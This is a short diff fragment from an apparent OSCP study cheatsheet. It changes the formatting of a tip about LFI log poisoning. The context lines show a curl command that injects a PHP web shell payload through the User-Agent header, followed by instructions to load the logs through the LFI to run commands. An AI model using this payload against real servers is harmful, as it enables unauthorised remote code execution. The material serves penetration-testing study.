douglaskataki/oscp-report-notes/Cheatsheet - Machines.md

 curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
 ```

-#note The logs will escape double quotes so use single quotes for strings in the PHP payload.
+NOTE: The logs will escape double quotes so use single quotes for strings in the PHP payload.

 Then request the logs via the LFI and execute your command.
 ```